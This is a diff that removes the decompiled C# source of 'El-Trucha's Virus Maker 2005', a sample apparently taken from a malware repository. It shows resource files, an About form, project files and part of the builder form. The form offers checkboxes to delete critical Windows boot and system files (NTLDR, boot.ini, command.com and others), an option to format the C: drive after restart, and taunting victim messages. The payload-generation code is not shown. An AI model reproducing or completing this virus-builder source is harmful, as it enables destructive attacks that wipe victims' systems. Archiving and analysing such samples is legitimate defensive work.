<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.Icon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5JY29uAgAAAAhJY29uRGF0YQhJY29uU2l6ZQcEAhNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAIAAAAJAwAAAAX8////E1N5c3RlbS5EcmF3aW5nLlNpemUCAAAABXdpZHRoBmhlaWdodAAACAgCAAAAAAAAAAAAAAAPAwAAAH4FAAACAAABAAEAEBAAAAEACABoBQAAFgAAACgAAAAQAAAAIAAAAAEACAAAAAAAQAUAAAAAAAAAAAAAAAEAAAABAAAA/zMAAAD/AP8AMwAA//8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQAAAAABAQEBAQEBAQEBAQEAAAAAAQECAgICAgICAgEBAAAAAAEBAgICAgICAgIBAQAAAAABAQICAwMDAwICAQEAAAAAAQECAgMDAwMCAgEBAAAAAAEBAgIDAwMDAgIBAQAAAAABAQICAwMDAwICAQEAAAAAAQECAgICAgICAgEBAAAAAAEBAgICAgICAgIBAQAAAAABAQEBAQEBAQEBAQEAAAAAAQEBAQEBAQEBAQEBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8L</value>
</data>
<data name="RichTextBox1.Text" xml:space="preserve">
<value>once that you open the file the following will be deleted hal.dll which is a verry important file and i advise you not to use that batch script rember the rules and what every do You have to fix if you do not agree click exit then open it again and do not click that button unless you agree to what i said
shawn wiebe</value>
</data>
</root>

View File

@ -1,128 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: El_Trucha_s_Virus_Maker_2005.About
// Assembly: "El-Trucha's Virus Maker 2005", Version=1.0.1913.26518, Culture=neutral, PublicKeyToken=null
// MVID: 43024C13-9626-43BD-9145-B3D934449AAC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.Trucha.a-b3a9f9bfca0d58d23a418e9baa7aa933399c352cb80473bdc3deeee4272e88fc.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Resources;
using System.Windows.Forms;
namespace El_Trucha_s_Virus_Maker_2005
{
public class About : Form
{
private Label label1;
private Label label2;
private LinkLabel linkLabel2;
private LinkLabel linkLabel1;
private PictureBox pictureBox1;
private Process ie;
private LinkLabel linkLabel3;
private Container components = (Container) null;
public About() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ResourceManager resourceManager = new ResourceManager(typeof (About));
this.label1 = new Label();
this.label2 = new Label();
this.linkLabel2 = new LinkLabel();
this.linkLabel1 = new LinkLabel();
this.pictureBox1 = new PictureBox();
this.ie = new Process();
this.linkLabel3 = new LinkLabel();
this.SuspendLayout();
this.label1.Location = new Point(8, 8);
this.label1.Name = "label1";
this.label1.Size = new Size(192, 56);
this.label1.TabIndex = 0;
this.label1.Text = "This program was made by El-Trucha (Leonardo M. Cabrera, in case somebody who knows me in real life doesn't believe me...)";
this.label1.TextAlign = ContentAlignment.TopCenter;
this.label2.Location = new Point(8, 72);
this.label2.Name = "label2";
this.label2.Size = new Size(192, 80);
this.label2.TabIndex = 1;
this.label2.Text = "Special thanks to my friend Defcon, who helped me with beta testing this program. Thanks also to the people at The Code Project and MSDN, which helped me with the code.";
this.label2.TextAlign = ContentAlignment.TopCenter;
this.linkLabel2.ImeMode = ImeMode.NoControl;
this.linkLabel2.LinkArea = new LinkArea(0, 20);
this.linkLabel2.Location = new Point(40, 240);
this.linkLabel2.Name = "linkLabel2";
this.linkLabel2.Size = new Size(120, 16);
this.linkLabel2.TabIndex = 31;
((Label) this.linkLabel2).TabStop = true;
this.linkLabel2.Text = "eltrucha14@gmail.com";
this.linkLabel2.LinkClicked += new LinkLabelLinkClickedEventHandler(this.linkLabel2_LinkClicked);
this.linkLabel1.ImeMode = ImeMode.NoControl;
this.linkLabel1.LinkArea = new LinkArea(0, 17);
this.linkLabel1.Location = new Point(48, 224);
this.linkLabel1.Name = "linkLabel1";
this.linkLabel1.Size = new Size(104, 16);
this.linkLabel1.TabIndex = 30;
((Label) this.linkLabel1).TabStop = true;
this.linkLabel1.Text = "www.TruchaSoft.tk";
this.linkLabel1.LinkClicked += new LinkLabelLinkClickedEventHandler(this.linkLabel1_LinkClicked);
this.pictureBox1.Image = (Image) resourceManager.GetObject("pictureBox1.Image");
this.pictureBox1.ImeMode = ImeMode.NoControl;
this.pictureBox1.Location = new Point(32, 160);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new Size(144, 56);
this.pictureBox1.TabIndex = 29;
this.pictureBox1.TabStop = false;
this.ie.SynchronizingObject = (ISynchronizeInvoke) this;
this.linkLabel3.Location = new Point(24, 256);
this.linkLabel3.Name = "linkLabel3";
this.linkLabel3.Size = new Size(160, 16);
this.linkLabel3.TabIndex = 32;
((Label) this.linkLabel3).TabStop = true;
this.linkLabel3.Text = "www.freewebs.com/evilmaiden";
this.AutoScaleBaseSize = new Size(5, 13);
this.ClientSize = new Size(208, 280);
this.Controls.Add((Control) this.linkLabel3);
this.Controls.Add((Control) this.linkLabel2);
this.Controls.Add((Control) this.linkLabel1);
this.Controls.Add((Control) this.pictureBox1);
this.Controls.Add((Control) this.label2);
this.Controls.Add((Control) this.label1);
this.FormBorderStyle = FormBorderStyle.FixedSingle;
this.Icon = (Icon) resourceManager.GetObject("$this.Icon");
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (About);
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "About ETVM05";
this.Load += new EventHandler(this.About_Load);
this.ResumeLayout(false);
}
private void About_Load(object sender, EventArgs e)
{
}
private void linkLabel1_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
{
this.ie.StartInfo.FileName = "iexplore.exe";
this.ie.StartInfo.Arguments = "\"http://www.truchasoft.tk\"";
this.ie.Start();
}
private void linkLabel2_LinkClicked(object sender, LinkLabelLinkClickedEventArgs e)
{
this.ie.StartInfo.FileName = "iexplore.exe";
this.ie.StartInfo.Arguments = "\"mailto:eltrucha14@gmail.com\"";
this.ie.Start();
}
}
}

View File

@ -1,13 +0,0 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyVersion("1.0.1913.26518")]

View File

@ -1,47 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.Trucha.a-b3a9f9bfca0d58d23a418e9baa7aa933399c352cb80473bdc3deeee4272e88fc.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{A0E2F77E-2528-46A8-AA21-B7E0235C837F}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>El-Trucha's Virus Maker 2005</AssemblyName>
<ApplicationVersion>1.0.1913.26518</ApplicationVersion>
<RootNamespace>El_Trucha_s_Virus_Maker_2005</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="About.cs" />
<Compile Include="ETVM05.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="About.resx" />
<EmbeddedResource Include="ETVM05.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "El-Trucha's Virus Maker 2005", "Constructor.Win32.Trucha.a-b3a9f9bfca0d58d23a418e9baa7aa933399c352cb80473bdc3deeee4272e88fc.csproj", "{A0E2F77E-2528-46A8-AA21-B7E0235C837F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{A0E2F77E-2528-46A8-AA21-B7E0235C837F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{A0E2F77E-2528-46A8-AA21-B7E0235C837F}.Debug|Any CPU.Build.0 = Debug|Any CPU
{A0E2F77E-2528-46A8-AA21-B7E0235C837F}.Release|Any CPU.ActiveCfg = Release|Any CPU
{A0E2F77E-2528-46A8-AA21-B7E0235C837F}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,795 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: El_Trucha_s_Virus_Maker_2005.ETVM05
// Assembly: "El-Trucha's Virus Maker 2005", Version=1.0.1913.26518, Culture=neutral, PublicKeyToken=null
// MVID: 43024C13-9626-43BD-9145-B3D934449AAC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.Trucha.a-b3a9f9bfca0d58d23a418e9baa7aa933399c352cb80473bdc3deeee4272e88fc.exe
using Microsoft.CSharp;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Resources;
using System.Windows.Forms;
namespace El_Trucha_s_Virus_Maker_2005
{
public class ETVM05 : Form
{
private GroupBox groupBox2;
private CheckBox autoexec_bat;
private CheckBox command_com;
private CheckBox win_ini;
private CheckBox win_com;
private CheckBox boot_ini;
private CheckBox ntldr;
private StreamWriter myvirus;
private GroupBox groupBox3;
private CheckBox far;
private CheckBox farMsgSelect;
private TextBox farMsg;
private Button makeVirus;
private TextBox endMsg;
private TextBox welMsg;
private Label label1;
private Label label2;
private TabControl tabControl2;
private TabPage tabPage3;
private TabPage tabPage4;
private TextBox welMsgText;
private TextBox welMsgTitle;
private RadioButton wmAst;
private RadioButton wmQuest;
private RadioButton wmError;
private RadioButton wmInfo;
private TextBox emText;
private Label label3;
private TextBox emTitle;
private Label label4;
private RadioButton emAst;
private RadioButton emQuest;
private RadioButton emError;
private RadioButton emInfo;
private TabControl msgType;
private TabPage dosCons;
private TabPage msgBox;
private CheckBox useMsgBox;
private CheckBox useDosCons;
private Label label5;
private Label label6;
private string wmIcon;
private string emIcon;
private Label stageLabel;
private ProgressBar stageProgress;
private Process compiler;
private HelpProvider help;
private Button about;
private string statusForLabel;
private Label label7;
private TextBox fileIcon;
private Container components = (Container) null;
public ETVM05() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
ResourceManager resourceManager = new ResourceManager(typeof (ETVM05));
this.groupBox2 = new GroupBox();
this.ntldr = new CheckBox();
this.boot_ini = new CheckBox();
this.win_com = new CheckBox();
this.win_ini = new CheckBox();
this.command_com = new CheckBox();
this.autoexec_bat = new CheckBox();
this.makeVirus = new Button();
this.groupBox3 = new GroupBox();
this.farMsg = new TextBox();
this.farMsgSelect = new CheckBox();
this.far = new CheckBox();
this.msgType = new TabControl();
this.dosCons = new TabPage();
this.label6 = new Label();
this.label5 = new Label();
this.useDosCons = new CheckBox();
this.endMsg = new TextBox();
this.welMsg = new TextBox();
this.msgBox = new TabPage();
this.useMsgBox = new CheckBox();
this.tabControl2 = new TabControl();
this.tabPage3 = new TabPage();
this.welMsgText = new TextBox();
this.label2 = new Label();
this.welMsgTitle = new TextBox();
this.label1 = new Label();
this.wmAst = new RadioButton();
this.wmQuest = new RadioButton();
this.wmError = new RadioButton();
this.wmInfo = new RadioButton();
this.tabPage4 = new TabPage();
this.emInfo = new RadioButton();
this.emText = new TextBox();
this.label3 = new Label();
this.emTitle = new TextBox();
this.label4 = new Label();
this.emAst = new RadioButton();
this.emQuest = new RadioButton();
this.emError = new RadioButton();
this.stageLabel = new Label();
this.stageProgress = new ProgressBar();
this.compiler = new Process();
this.help = new HelpProvider();
this.fileIcon = new TextBox();
this.about = new Button();
this.label7 = new Label();
this.groupBox2.SuspendLayout();
this.groupBox3.SuspendLayout();
this.msgType.SuspendLayout();
this.dosCons.SuspendLayout();
this.msgBox.SuspendLayout();
this.tabControl2.SuspendLayout();
this.tabPage3.SuspendLayout();
this.tabPage4.SuspendLayout();
this.SuspendLayout();
this.groupBox2.Controls.Add((Control) this.ntldr);
this.groupBox2.Controls.Add((Control) this.boot_ini);
this.groupBox2.Controls.Add((Control) this.win_com);
this.groupBox2.Controls.Add((Control) this.win_ini);
this.groupBox2.Controls.Add((Control) this.command_com);
this.groupBox2.Controls.Add((Control) this.autoexec_bat);
this.groupBox2.FlatStyle = FlatStyle.System;
this.help.SetHelpString((Control) this.groupBox2, "Select all the files you want to delete.");
this.groupBox2.Location = new Point(216, 8);
this.groupBox2.Name = "groupBox2";
this.help.SetShowHelp((Control) this.groupBox2, true);
this.groupBox2.Size = new Size(120, 120);
this.groupBox2.TabIndex = 1;
this.groupBox2.TabStop = false;
this.groupBox2.Text = "Files to Delete";
this.ntldr.FlatStyle = FlatStyle.System;
this.ntldr.ImeMode = ImeMode.NoControl;
this.ntldr.Location = new Point(8, 96);
this.ntldr.Name = "ntldr";
this.ntldr.Size = new Size(72, 16);
this.ntldr.TabIndex = 18;
this.ntldr.Text = "NTLDR";
this.boot_ini.FlatStyle = FlatStyle.System;
this.boot_ini.ImeMode = ImeMode.NoControl;
this.boot_ini.Location = new Point(8, 80);
this.boot_ini.Name = "boot_ini";
this.boot_ini.Size = new Size(72, 16);
this.boot_ini.TabIndex = 17;
this.boot_ini.Text = "boot.ini";
this.win_com.FlatStyle = FlatStyle.System;
this.win_com.ImeMode = ImeMode.NoControl;
this.win_com.Location = new Point(8, 64);
this.win_com.Name = "win_com";
this.win_com.Size = new Size(72, 16);
this.win_com.TabIndex = 16;
this.win_com.Text = "Win.com";
this.win_ini.FlatStyle = FlatStyle.System;
this.win_ini.ImeMode = ImeMode.NoControl;
this.win_ini.Location = new Point(8, 48);
this.win_ini.Name = "win_ini";
this.win_ini.Size = new Size(64, 16);
this.win_ini.TabIndex = 15;
this.win_ini.Text = "Win.ini";
this.command_com.FlatStyle = FlatStyle.System;
this.command_com.ImeMode = ImeMode.NoControl;
this.command_com.Location = new Point(8, 32);
this.command_com.Name = "command_com";
this.command_com.Size = new Size(104, 16);
this.command_com.TabIndex = 14;
this.command_com.Text = "Command.com";
this.autoexec_bat.FlatStyle = FlatStyle.System;
this.autoexec_bat.ImeMode = ImeMode.NoControl;
this.autoexec_bat.Location = new Point(8, 16);
this.autoexec_bat.Name = "autoexec_bat";
this.autoexec_bat.Size = new Size(96, 16);
this.autoexec_bat.TabIndex = 13;
this.autoexec_bat.Text = "Autoexec.bat";
this.makeVirus.FlatStyle = FlatStyle.System;
this.makeVirus.Font = new Font("Papyrus", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);
this.help.SetHelpString((Control) this.makeVirus, "Make the virus.");
this.makeVirus.ImeMode = ImeMode.NoControl;
this.makeVirus.Location = new Point(216, 160);
this.makeVirus.Name = "makeVirus";
this.help.SetShowHelp((Control) this.makeVirus, true);
this.makeVirus.Size = new Size(120, 48);
this.makeVirus.TabIndex = 30;
this.makeVirus.Text = "Be mean,\nMake Virus!!";
this.makeVirus.Click += new EventHandler(this.makeVirus_Click);
this.groupBox3.Controls.Add((Control) this.farMsg);
this.groupBox3.Controls.Add((Control) this.farMsgSelect);
this.groupBox3.Controls.Add((Control) this.far);
this.groupBox3.Cursor = Cursors.Default;
this.groupBox3.FlatStyle = FlatStyle.System;
this.help.SetHelpString((Control) this.groupBox3, "Options for reformatting hard drive.");
this.groupBox3.Location = new Point(344, 8);
this.groupBox3.Name = "groupBox3";
this.help.SetShowHelp((Control) this.groupBox3, true);
this.groupBox3.Size = new Size(144, 96);
this.groupBox3.TabIndex = 18;
this.groupBox3.TabStop = false;
this.groupBox3.Text = "Miscelaneous";
this.farMsg.Enabled = false;
this.help.SetHelpString((Control) this.farMsg, "If you checked the above checkbox, then this message will be shown while it formats.");
this.farMsg.Location = new Point(8, 64);
this.farMsg.Name = "farMsg";
this.help.SetShowHelp((Control) this.farMsg, true);
this.farMsg.Size = new Size(128, 20);
this.farMsg.TabIndex = 21;
this.farMsg.Text = "I'm formatting your PC now...hope you don't mess with the wrong people next time...hehe...";
this.farMsgSelect.Enabled = false;
this.farMsgSelect.FlatStyle = FlatStyle.System;
this.help.SetHelpString((Control) this.farMsgSelect, "If you checked the above checkbox, then this message will be shown while it formats.");
this.farMsgSelect.ImeMode = ImeMode.NoControl;
this.farMsgSelect.Location = new Point(8, 48);
this.farMsgSelect.Name = "farMsgSelect";
this.help.SetShowHelp((Control) this.farMsgSelect, true);
this.farMsgSelect.Size = new Size(96, 16);
this.farMsgSelect.TabIndex = 20;
this.farMsgSelect.Text = "Message";
this.farMsgSelect.CheckedChanged += new EventHandler(this.farMsgSelect_CheckedChanged);
this.far.FlatStyle = FlatStyle.System;
this.help.SetHelpString((Control) this.far, "Select this if you want to reformat the C: drive after restart.");
this.far.ImeMode = ImeMode.NoControl;
this.far.Location = new Point(8, 16);
this.far.Name = "far";
this.help.SetShowHelp((Control) this.far, true);
this.far.Size = new Size(120, 32);
this.far.TabIndex = 19;
this.far.Text = "Format C: drive after restart";
this.far.CheckedChanged += new EventHandler(this.far_CheckedChanged);
this.msgType.Controls.Add((Control) this.dosCons);
this.msgType.Controls.Add((Control) this.msgBox);
this.help.SetHelpString((Control) this.msgType, "Select which method you want for messages.");
this.msgType.ItemSize = new Size(76, 18);
this.msgType.Location = new Point(8, 8);
this.msgType.Name = "msgType";
this.msgType.SelectedIndex = 0;
this.help.SetShowHelp((Control) this.msgType, true);
this.msgType.Size = new Size(200, 200);
this.msgType.TabIndex = 1;
this.dosCons.Controls.Add((Control) this.label6);
this.dosCons.Controls.Add((Control) this.label5);
this.dosCons.Controls.Add((Control) this.useDosCons);
this.dosCons.Controls.Add((Control) this.endMsg);
this.dosCons.Controls.Add((Control) this.welMsg);
((Control) this.dosCons).Location = new Point(4, 22);
this.dosCons.Name = "dosCons";
this.dosCons.Size = new Size(192, 174);
this.dosCons.TabIndex = 0;
this.dosCons.Text = "DOS Console";
this.label6.ImeMode = ImeMode.NoControl;
this.label6.Location = new Point(8, 80);
this.label6.Name = "label6";
this.label6.Size = new Size(56, 16);
this.label6.TabIndex = 10;
this.label6.Text = "Ending:";
this.label5.ImeMode = ImeMode.NoControl;
this.label5.Location = new Point(8, 32);
this.label5.Name = "label5";
this.label5.Size = new Size(56, 16);
this.label5.TabIndex = 9;
this.label5.Text = "Welcome:";
this.useDosCons.Checked = true;
this.useDosCons.CheckState = CheckState.Checked;
this.useDosCons.FlatStyle = FlatStyle.System;
this.help.SetHelpString((Control) this.useDosCons, "If this is checked, then a two DOS windows with messages will be shown at the beginning and end of the program.");
this.useDosCons.ImeMode = ImeMode.NoControl;
this.useDosCons.Location = new Point(8, 8);
this.useDosCons.Name = "useDosCons";
this.help.SetShowHelp((Control) this.useDosCons, true);
this.useDosCons.Size = new Size(120, 16);
this.useDosCons.TabIndex = 2;
this.useDosCons.Text = "Use DOS Console";
this.useDosCons.CheckedChanged += new EventHandler(this.useDosCons_CheckedChanged);
this.help.SetHelpString((Control) this.endMsg, "If you select the above checkbox, then this will be shown on a DOS console window at the end of the program.");
this.endMsg.Location = new Point(8, 96);
this.endMsg.Name = "endMsg";
this.help.SetShowHelp((Control) this.endMsg, true);
this.endMsg.Size = new Size(176, 20);
this.endMsg.TabIndex = 4;
this.endMsg.Text = "Your computer's gonna die now!!";
this.help.SetHelpString((Control) this.welMsg, "If you select the above checkbox, then this will be shown on a DOS console window at the beginning of the program.");
this.welMsg.Location = new Point(8, 48);
this.welMsg.Name = "welMsg";
this.help.SetShowHelp((Control) this.welMsg, true);
this.welMsg.Size = new Size(176, 20);
this.welMsg.TabIndex = 3;
this.welMsg.Text = "Welcome to the installer!";
this.msgBox.Controls.Add((Control) this.useMsgBox);
this.msgBox.Controls.Add((Control) this.tabControl2);
((Control) this.msgBox).Location = new Point(4, 22);
this.msgBox.Name = "msgBox";
this.msgBox.Size = new Size(192, 174);
this.msgBox.TabIndex = 1;
this.msgBox.Text = "Message Box";
this.useMsgBox.FlatStyle = FlatStyle.System;
this.help.SetHelpString((Control) this.useMsgBox, "If this is checked, then a two message boxes with messages will be shown at the beginning and end of the program.");
this.useMsgBox.ImeMode = ImeMode.NoControl;
this.useMsgBox.Location = new Point(8, 8);
this.useMsgBox.Name = "useMsgBox";
this.help.SetShowHelp((Control) this.useMsgBox, true);
this.useMsgBox.Size = new Size(120, 16);
this.useMsgBox.TabIndex = 5;
this.useMsgBox.Text = "Use Message Box";
this.useMsgBox.CheckedChanged += new EventHandler(this.useMsgBox_CheckedChanged);
this.tabControl2.Controls.Add((Control) this.tabPage3);
this.tabControl2.Controls.Add((Control) this.tabPage4);
this.help.SetHelpString((Control) this.tabControl2, "Select a tab for the properties of the message.");
this.tabControl2.ItemSize = new Size(57, 18);
this.tabControl2.Location = new Point(8, 32);
this.tabControl2.Name = "tabControl2";
this.tabControl2.SelectedIndex = 0;
this.help.SetShowHelp((Control) this.tabControl2, true);
this.tabControl2.Size = new Size(176, 128);
this.tabControl2.TabIndex = 6;
this.tabPage3.Controls.Add((Control) this.welMsgText);
this.tabPage3.Controls.Add((Control) this.label2);
this.tabPage3.Controls.Add((Control) this.welMsgTitle);
this.tabPage3.Controls.Add((Control) this.label1);
this.tabPage3.Controls.Add((Control) this.wmAst);
